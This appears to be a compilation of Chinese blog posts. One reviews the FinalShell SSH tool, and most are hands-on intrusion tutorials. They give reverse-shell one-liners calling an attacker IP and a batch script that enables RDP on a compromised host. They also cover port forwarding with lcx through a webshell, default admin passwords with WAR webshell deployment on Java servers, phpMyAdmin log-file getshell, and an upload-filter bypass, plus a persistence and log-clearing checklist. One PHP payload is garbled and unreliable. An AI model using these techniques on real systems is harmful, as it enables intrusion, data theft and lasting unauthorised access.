引言 FinalShell是一款免费的国产的集SSH工具、服务器管理、远程桌面加速的良心软件,同时支持Windows,macOS,Linux，它不单单是一个SSH工具，完整的说法应该叫一体化的服务器/网络管理软件。 FinalShell在很大程度上可以免费替代XShell，是国产中不多见的良心产品，具有免费海外服务器远程桌面加速,ssh加速,双边tcp加速,内网穿透等特色功能。 先预览一张使用时的截图。 使用截图预览 功能简介 连接linux服务器 我们第一步打开软件，然后点击如图红色线框所示处 开始使用 然后出现如图所示的功能菜单，可以连接linux服务器和windows远程桌面，这里我们先点击linux服务器 打开连接 在弹出的窗口中输入你的用户名和密码，认证方式你也可以选择其他的方式，我这里是使用用户名和密码连接测试的阿里的一台linux服务器 新建linux连接 然后在服务器列表中双击打开，这是成功后的界面 工作界面 支持复制粘贴 左边是一些服务器端数据的监控 服务器端监控 工作台下面是一些快捷菜单工具栏 快捷菜单栏 最下面是服务器文件管理 文件管理 它支持一些常用的操作，包括下载、打包传输、上传等常用的文件操作，非常的方便 文件管理 右上角还收藏了一些菜单 菜单 在选项中它还有一些常用的设置 常规设置 目前多达124个主题配色可供你选择，还有字体的设置 主题配色字体设置 连接windows 手头上没有测试环境，所以就不带大家测试了，我相信大多数情况下，可能连接Linux比较多一些。 连接windows 升级高级版（我觉得免费版已经足够强大了，而且很好用，如果支持国产可以考虑使用高级版，下面是高级版的部分功能） 网络监控可选择接口,同时监控多个网络接口速度. 打包传输,自动压缩解压,适合传输大量文件,文件夹和文本文件. 高级网络监控,监控每个进程监听的端口,以及网络 高级进程管理,详细显示进程信息.连接状态. 无限制的终端命令历史,路径历史,可快速输入命令,切换路径. 多地点ping监控,可选择不同地点. 总结 本文介绍一一个可以替代XShell的服务器管理软件，已经充分满足开发和运维需求，值得我们去使用。 ...

0x00 信息收集 1.目标确认 1.1 域名注册信息 目标所有者信息 获取真实IP 验证是否存在CDN 绕过CDN查找网站真实IP 1.2 DNS信息查询 目的: 注册者名称及邮箱,再反查其他域名 手机号 座机号 ASN号 地址在线DNS信息查询工具 1.3 测试域传送漏洞 域传送是一种DNS事务，用于在主从服务器间复制DNS记录。虽然如今已经很少见主机会开启，但是还是应该确认一下。一旦存在域传送漏洞，就意味着你获取了整个域下面所有的记录。 1.4 业务相关 github泄露： 网盘泄露： 各种云网盘 敏感路径扫描： 2.OSINT 公开情报收集 2.1 社工技巧 查看注册的网站： 可以从这些方面判断用户是否注册过 知道QQ 知道手机号 留意社交动态 2.2 搜索引擎OSINT Google Hacking(baidu\bing\souhu\github) 2.3 浏览器实用插件： Wappalyzer：识别网站使用的中间件及其版本，再去漏洞库和搜索引擎找公开披露的漏洞 SwitchOmega：快捷切换代理 shodan：识别开放端口，主机服务等（被动信息搜集） hacktools:综合插件,很强大 firefox渗透便携版version48,工具集成很多 注意：根据获得服务、中间件信息、编辑器版本、数据库等OSINT去各大漏洞库、搜索引擎找漏洞利用 2.4 乌云和cnvd 乌云库\乌云镜像\GHDB\CNVD等公开漏洞库 0x01 主动探测 从管理员和用户的角度了解整个WEB应用乃至整个目标的全貌，主动探测会暴露ip以及留下日志信息，所以要... 1.主动扫描 1.1 常见服务漏洞 nmap的功能: 脚本扫描，隐蔽扫描，端口扫描，服务识别，OS识别，探测WAF 1.3 WAF及bypass 探测WAF bypass 1.4 目录、后台和敏感路径文件扫描 御剑目录、后台扫描 2.人工浏览\逐个请求burp 非常重要,有必要手动去浏览每个页面，点击页面上每一个跳转，这样在Burp的sitemap里面就可以出现这些请求和响应。 图片后台地址\图片后面的信息 跳转参数\奇怪的参数 泄露邮箱等社工信息 业务逻辑\架构 3.自动化 自动化渗透测试框架:(待补充) Sn1per Ary 0x02 漏洞挖掘 1.漏洞扫描工具 注意:登录类网站扫描要带cookies扫才能扫到 1.1 Nikto Web服务漏洞扫描器 1.2 AWVS漏扫 1.3 NESSUS 1.4 Xray自动化的漏洞挖掘 1.5 Fuzz 2.挖掘漏洞 2.1 SQL注入： 2.2 XSS： 2.3 文件上传 2.4 命令执行 2.5 弱口令及字典破解 后台弱口令爆破撞库 2.6 逻辑漏洞 0x03 漏洞利用 对应0x02的挖掘漏洞，进行对应的利用。 0x04 提升权限 提升权限不一定需要，根据任务目标决定。 1.1 内核漏洞 1.2 root权限运行的漏洞软件 1.3 弱密码/重用密码 1.4 suid配置错误 1.5 滥用sudo 1.6 Cronjobs 1.6 敏感文件 0x05 达成目标 1.1 重要文件窃取 1.2 数据库数据窃取、修改 0x06 权限维持 1.1 web后门 1.2 SSH后门 1.3 Cronjobs 1.4 SSH公钥 1.5 SUID=0用户 1.6 木马文件 0x07 防御对抗 1.1 日志清除 1.2 防护软件对抗（卸载） 1.3 进程注入 1.4 进程隐藏 0x08 横向移动 1.1 信息收集 1.2 隧道搭建 1.3 内网扫描 1.4 漏洞扫描 返回到主动探测的步骤，再来一遍。 写在结尾 很多攻击手法不能一一列举，之后会单独分模块展开叙述，如有技术问题交流，可以加入交流群。 ...

一、查询远程连接的端口 1、命令查询，win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 2、批处理开启，将下面代码复制到bat文件，双击自行开启远程连接 echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg 三、当3389端口被修改后，如何查找 1、通过大马的读注册表、找到3389端口，然后读取 2、通过大马的cmd命令 tasklist /svc,获取termservice的pid号 再执行netstat -ano查找2684对应的的端口就是远程连接端口 3、通过工具扫描 工具下载方式：加入交流群 注意：软件均来自网络，不能保证安全性 ...

一、环境： 1、内网主机IP：192.168.1.106  win2003 2、假设外网主机ip：192.168.1.104 win7 二、通过大马上传lcx.exe到服务器内网 1、将内网3389端口转发到外网2222端口 lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389 2、在攻击机win7监听2222本地端口，转发到4444端口 lcx.exe -listen 2222 4444 3、在攻击机win7中远程连接 三、利用工具转发reDuh 1、将软件自带的脚本拷贝到服务器中，根据不同环境，选择不同脚本 2、打开reDuh，将脚本文件上传的路径填写到URL，点击start，再点击create 3、打开远程连接，这个有点缓慢，但是可以连接成功的，详细见交流群视频教程 工具下载方式：加入交流群 ...

一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12，打开谷歌自带的开发人员工具，点击network 三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码 四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改 注意：抓包的时候，有的后门不是一登录就发送的，也有可能停一段时间才发送，甚至当你退出的时候才发送 ...

1.weblogic 后台页面：（http为7001，https为7002） Google关键字：WebLogic Server AdministrationConsole inurl:console 默认的用户名密码 1、用户名密码均为：weblogic 2、用户名密码均为：system 3、用户名密码均为：portaladmin 4、用户名密码均为：guest 上传地方： workshop> Deployments> Web应用程序> 部署新的 Web 应用程序模块… 上传war的webshell。   上传后目标模块->部署。 2.Tomcat 后台：http://172.16.102.35:8080/manager/html 默认用户名密码 tomcat tomcat 上传地方：   Deploy之后即发布成功 shell地址：http://172.16.102.35:8080/magerx/test.jsp(其中magerx为war包的名字） 3.jboss 后台：http://172.16.102.35:9990 上传地方：Deployments>Manage Deployments>Add Content Enable后即可发布 shell地址： http://172.16.102.35:8080/magerx/test.jsp 4.JOnAS 后台：http://172.16.102.35:9000/jonasAdmin/ 默认用户名密码： jadmin jonas tomcat tomcat jonas jonas 上传地方：Deployment>Web Modules (WAR)>Upload Apply之后即可发布 shell地址:http://172.16.102.35:9000/magerx/test.jsp 5.WebSphere 后台地址:https://172.16.102.35:9043/ibm/console/logon.jsp 上传地方:应用程序>新建应用程序>新建企业应用程序 接下来各种下一步，步骤4注意填好“上下文根” 完成后单击保存 回到应用程序>应用程序类型>WebSphere 企业应用程序  选中你上传的war包 这里是paxmac  点击启动 即可发布 shell地址:http://172.16.102.35:9080/paxmac/test.jsp <!– jsp文件打包，可以使用jdk/JRE自带的jar命令： 切换到要打包的文件目录 jar -cvf magerx.war  test.jsp –> ...

在我们渗透测试的过程中，最常用的就是基于tcp/udp协议反弹一个shell，也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接：我们本机去连接目标机器，比如ssh和mstsc 反向连接：目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内，我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 攻击机：Kali Linux ：47.98.229.211 受害机：Centos 7 ：149.129.68.117（阿里云服务器） 姿势一 bash bash也是最常见的一种方式 Kali监听 nc -lvvp 4444 Shell  复制 centos运行 bash -i >& /dev/tcp/47.98.229.211/5555 0>&1 Shell  复制 执行命令后，成功得到反弹！ 姿势二 python 攻击机Kali还是监听 nc -lvvp 5555 Shell  复制 centos执行 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' Python  复制 姿势三 nc 如果目标机器上有nc并且存在-e参数，那么可以建立一个反向shell 攻击机监听 nc -lvvp 5555 Shell  复制 目标机器执行 nc 47.98.229.211 5555 -t -e /bin/bash Shell  复制 这样会把目标机的/bin/bash反弹给攻击机 但是很多Linux的nc很多都是阉割版的，如果目标机器没有nc或者没有-e选项的话，不建议使用nc的方式 姿势四 php 攻击机监听 nc -lvvp 4444 Shell  复制 要求目标机器有php然后执行 php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Shell  复制 其他的一些高能操作 关于PHP的payload 现在msfconsole中进行简单的配置 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 Shell  复制 PHP <? php error_reporting(0); $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s > PHP  复制 ...

关键字：phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令：root 成功，如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径，我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和 general log file 你可以用 CTRL+F 需要把general log 改成ON 把 general log file修改成绝对路径的地址。C:/phpStudy/WWW/.xxx.php >>>这个xxx.php是你一句话的地址 如图。 修改好后。我们需要把这个命令插入到我们指定的php文件里 如图。 ...

一、物理路径 在url后面随便输入个字符，得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议，如果被非正常手段登录，将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口，如果被非正常手段登录，将会面临数据库泄露问题 445是曾经暴出”永恒之蓝”病毒的端口 五、后台 后台系统及型号 六、编辑器 抓包获取编辑器地址，并且发现是dede下的编辑器，估计模板也是dede二次加工的了。 七、拿shell(仅列举一种方法-上传绕过) 直接上传一句话木马(php后缀)，提示文件类型不正确 将一句话木马后缀修改为jpg格式，继续上传 。 上传成功。打开burpsuite，重新上传jpg后缀的一句话木马 。 将yjh.jpg修改为yjh.php[空格]。一定要在修改完的php后缀后面加上一个空格。如下图 然后点击action里面的send to repeater 。 打开repeater下的Hex，查找到yjh.php文件，修改对应行Hex值，由20改为00 。 即可发现原来的空格已经没有了 。 然后点击Go，放包。 链接访问成功，然后拿出中国菜刀，连接shell。 ...